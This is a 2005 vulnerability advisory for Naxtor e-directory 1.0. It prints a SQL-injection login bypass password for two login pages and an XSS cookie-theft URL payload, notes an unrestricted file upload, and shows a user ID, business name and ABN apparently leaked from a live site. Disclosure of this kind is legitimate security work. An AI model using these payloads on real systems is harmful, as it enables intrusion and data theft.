Update:
3:34 03/08/2005
Subject:
" Naxtor e-directory Multiple Vulnerability "
Vulnerable version:
Naxtor e-directory 1.0
Typical software:
commercial
Vendor URL:
Mail - sales@naxtor.com.au
WWW - www.naxtor.com.au
Description:
Naxtor e-directory is a powerful, flexible software application developed specifically for the requirements of
membership directories.
It’s different to all other traditional directories as merchants are not only limited to advertise service or product
listing rather provide with promotional schemes to market products and services.
Admin has full control over merchant’s listings and promotional scheme and can approve or disapprove based on merchant
credentials anytime.
Vulnerability:
A multiple vulnerabilities found in Naxtor e-directory ASP product.
The following one is Administration login that could user inject SQL command to take Administration privillage.
The administration page is vulnerable to get access admin privallage.
Use method SQL Injection in the form admin login,after succesfull logged,
we can run as Admininistration of website.
1.Sample SQL Injection:
.admin/default.asp
User ID : admin
Password : 'or '='
2.Sample SQL Injection:
.signin.asp:
User ID : admin
Password : 'or '='
If login into signin.asp form succesfully, user may upload image whit any file type that could
execute some command to take over computer victim.
Other vulnerable string user can steal cookies by input CSS into URL browser,example:
http://host/site/message.asp?message=[script]alert(document.cookie);[/script]
Also executing by some URL command into browser we can see the user ID,bussines name and ABN number.
http://host/users/message.asp
as result:
User' Id:
asad
Business name:
UNIVERSAL ELECTRONIC SERVICES
ABN No:
78 764 879 417
Solution:
Vendor has contacted for this vulnerability.
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com